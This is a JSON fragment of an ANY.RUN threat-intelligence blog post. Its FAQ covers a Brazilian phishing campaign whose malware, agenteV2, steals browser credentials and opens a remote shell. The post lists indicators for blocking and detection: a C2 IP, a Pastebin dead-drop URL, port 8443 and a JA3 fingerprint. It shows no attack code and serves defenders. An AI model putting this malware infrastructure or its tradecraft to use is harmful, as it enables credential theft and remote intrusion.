name=search_term_string"}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/any.run\/","name":"ANY.RUN","url":"https:\/\/any.run\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/any.run\/","url":"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2020\/08\/ANYRUN-Icon.svg","contentUrl":"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2020\/08\/ANYRUN-Icon.svg","width":1,"height":1,"caption":"ANY.RUN"},"image":{"@id":"https:\/\/any.run\/"},"sameAs":["https:\/\/www.facebook.com\/www.any.run\/","https:\/\/twitter.com\/anyrun_app","https:\/\/www.linkedin.com\/company\/30692044","https:\/\/www.youtube.com\/channel\/UCOgCPho7lzmH7m6fPNlukrQ"]},{"@type":"Person","@id":"https:\/\/any.run\/","name":"Moises Cerqueira (0xOlympus)","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/any.run\/","url":"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/02\/Moises.jpg","contentUrl":"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/02\/Moises.jpg","caption":"Moises Cerqueira (0xOlympus)"},"description":"Malware Researcher & Threat Hunter with a strong background in Blue Team operations. Specialized in malware analysis and reverse engineering, with hands-on experience dissecting binaries and reconstructing attacker TTPs from initial delivery to command-and-control communication. Driven by a deep interest in adversary tradecraft, bridging low-level technical analysis with strategic threat intelligence and detection engineering. Follow Moises on: LinkedIn X Website","sameAs":["https:\/\/0xdelta.org\/"],"url":"#molongui-disabled-link"},{"@type":"Question","@id":"https:\/\/any.run\/cybersecurity-blog\/brazilian-banking-phishing-campaign\/#faq-question-1777028022700","position":1,"url":"https:\/\/any.run\/cybersecurity-blog\/brazilian-banking-phishing-campaign\/#faq-question-1777028022700","name":"Who is targeted by this campaign?","answerCount":1,"acceptedAnswer":{"@type":"Answer","text":"This campaign targets Brazilian individuals and organizations \u2014 anyone who might receive what appears to be an official court summons. The lure is broad (civil conciliation hearing, not targeted spearphishing), meaning any employee in Brazil could be a victim. ","inLanguage":"en-US"},"inLanguage":"en-US"},{"@type":"Question","@id":"https:\/\/any.run\/cybersecurity-blog\/brazilian-banking-phishing-campaign\/#faq-question-1777028100417","position":2,"url":"https:\/\/any.run\/cybersecurity-blog\/brazilian-banking-phishing-campaign\/#faq-question-1777028100417","name":"My organization doesn't do banking in Brazil. Should we still care?","answerCount":1,"acceptedAnswer":{"@type":"Answer","text":"Yes. The stealer harvests all browser-saved credentials \u2014 not just banking ones \u2014 across all Chromium-based browser profiles. Corporate credentials stored in browser password managers (email, SaaS platforms, VPNs, internal portals) are all at risk. Additionally, the malware installs a full remote shell, meaning a successful infection grants the attacker persistent, elevated access to the corporate endpoint regardless of banking activity.","inLanguage":"en-US"},"inLanguage":"en-US"},{"@type":"Question","@id":"https:\/\/any.run\/cybersecurity-blog\/brazilian-banking-phishing-campaign\/#faq-question-1777028296008","position":3,"url":"https:\/\/any.run\/cybersecurity-blog\/brazilian-banking-phishing-campaign\/#faq-question-1777028296008","name":"How quickly can an attacker conduct financial fraud after initial infection?","answerCount":1,"acceptedAnswer":{"@type":"Answer","text":"Very quickly. The malware begins beaconing to C2 within approximately 30 seconds of the VBS file being executed. Once the operator's WebSocket session is established, they can view the victim's screen in real time. If a banking session is already open in the browser, fraud could occur within minutes. The operator is not automated \u2014 they are watching and waiting, which means they will time their intervention to maximize impact (e.g., during an active funds transfer).","inLanguage":"en-US"},"inLanguage":"en-US"},{"@type":"Question","@id":"https:\/\/any.run\/cybersecurity-blog\/brazilian-banking-phishing-campaign\/#faq-question-1777028519139","position":4,"url":"https:\/\/any.run\/cybersecurity-blog\/brazilian-banking-phishing-campaign\/#faq-question-1777028519139","name":"We blocked the C2 IP (38.242.246.176). Are we protected?","answerCount":1,"acceptedAnswer":{"@type":"Answer","text":"Partially. Blocking the known C2 IP prevents beaconing to the current infrastructure, but the Pastebin dead-drop resolver means the attacker can rotate to a new IP simply by editing a public Pastebin page \u2014 without touching any already-deployed malware. Blocking the specific Pastebin URL (pastebin.com\/raw\/0RmxqY57) and monitoring for TLS connections to port 8443 from non-browser processes provides more durable protection. The JA3 fingerprint (a48c0d5f95b1ef98f560f324fd275da1) is particularly valuable as it will detect agenteV2's TLS handshake regardless of IP rotation.","inLanguage":"en-US"},"inLanguage":"en-US"},{"@type":"Question","@id":"https:\/\/any.run\/cybersecurity-blog\/brazilian-banking-phishing-campaign\/#faq-question-1777028533483","position":5,"url":"https:\/\/any.run\/cybersecurity-blog\/brazilian-banking-phishing-campaign\/#faq-question-1777028533483","name":"How can ANY.RUN help us detect, investigate, and respond to this threat?","answerCount":1,"acceptedAnswer":{"@type":"Answer","text":"ANY.RUN's Interactive Sandbox was used to conduct the full dynamic analysis in this report \u2014 providing complete visibility into the infection chain, process trees, API traces, network connections, and registry modifications. For ongoing defense: TI Lookup lets analysts query all IOCs from this report for correlated intelligence; TI Feeds push live indicators into your SIEM\/SOAR\/EDR for automated blocking; and the YARA rule in section 9.3 can be deployed to automatically detect new agenteV2 variants. The Enterprise suite combines all these capabilities in a unified platform designed for security teams that need to investigate and respond at scale.","inLanguage":"en-US"},"inLanguage":"en-US"}]}},"_links":{"self":[{"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/posts\/20342"}],"collection":[{"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/users\/19"}],"replies":[{"embeddable":true,"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/comments?post=20342"}],"version-history":[{"count":158,"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/posts\/20342\/revisions"}],"predecessor-version":[{"id":20520,"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/posts\/20342\/revisions\/20520"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/media\/20344"}],"wp:attachment":[{"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/media?parent=20342"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/categories?post=20342"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/tags?post=20342"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}